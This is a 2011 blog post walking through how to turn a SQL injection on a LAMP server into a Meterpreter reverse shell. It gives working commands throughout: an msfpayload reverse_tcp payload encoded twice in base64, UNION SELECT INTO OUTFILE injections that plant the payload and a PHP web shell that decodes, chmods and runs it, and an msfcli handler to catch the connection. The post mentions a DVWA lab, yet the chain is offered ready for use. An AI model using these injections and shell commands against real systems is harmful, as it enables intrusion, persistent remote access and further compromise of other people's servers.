Tuesday, June 21, 2011

Going from SQL Injection to Reverse Shell Walkthrough

So much for trying to start blogging... I started this blog a few months ago and totally forgot about it... hah! Well, here is the first real post! Enjoy!

Anyway, I was trying to look on the interwebz for a good walkthrough on getting a reverse shell from a SQLi vulnerability on a LAMP system and couldn't find one (unless my google-fu sucks) so here is one that I have put together.  This is assuming a fairly standard/secure configuration where both MySQL and Apache are not running as root and have little privileges and that your MySQL user has write privs to your www directory.
  1. First you need to find your SQL injection vulnerability. :)
  2. Next, we need to generate our payload.  We will use msfpayload for this and base64 encode it twice to ensure that we don't have any bad chars when we send it to the remote server. Change the LHOST option to match your local IP.  You can also specify a specific port with LPORT=<port>.
    1. # msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 X | base64 | base64
    2. You will then get your base64 encoded string. Copy it.
  3. We now need to send it to our remote server through the SQL injection vulnerability.  Best place to create the file is in the /tmp directory on the remote server as any account has access to it.
    1. http://www.bad.site/vulnpage.php?id=-1 UNION SELECT “ZjBWTVJnRUJBUUFBQUFBQUFBQUFBQUlBQXdBQkFBQUFWSUFFQ0RRQUFBQUFBQUFBQUFBQUFEUUFJQUFCQUFBQUFBQUFBQUVBQUFBQQpBQUFBQUlBRUNBQ0FCQWk0QUFBQXVBQUFBQWNBQUFBQUVBQUFNZHRUUTFOcUFtcG1XSW5oellDWFcyakFxQUVVWm1nUlhHWlRpZUZxClpsaFFVVmVKNFVQTmdGdVp0Z3l3QTgyQS8rRT0K" INTO OUTFILE '/tmp/mettemp'
  4. Next we need to create a PHP page to base64 decode the payload and create a new file that the apache user can execute.  This page will read the file with the base64 encoded string that we create earlier, base64 decode it, create a new file in the /tmp directory, chmod the file so its executable, then execute the file.
    1. http://www.bad.site/vulnpage.php?id=-1 UNION SELECT '<?php $myfile = "/tmp/mettemp"; $myfile2 = "/tmp/metexec"; $fh = fopen($myfile, "r"); $data = fread($fh, filesize($myfile)); fclose($fh); $fh2 = fopen($myfile2, "a"); fwrite($fh2, base64_decode(base64_decode($data))); fclose($fh2); system("chmod 777 " . $myfile2); system($myfile2); echo "pwned"; ?>' INTO OUTFILE '/var/www/html/rev_shell.php'
  5. On your local system, you need to then start your handler for the reverse shell.
    1. # msfcli exploit/multi/handler payload=linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 E
  6. Now all you need to do is browse to the rev_shell.php page that you created earlier and enjoy your reverse meterpreter shell.

You will only have the privs of the apache user, but then you can continue with privilege escalation for more fun.

If you want to test this out in a lab environment, you can use the Damn Vulnerable Web App (DVWA) in the Web Security Dojo VM and a BackTrack VM.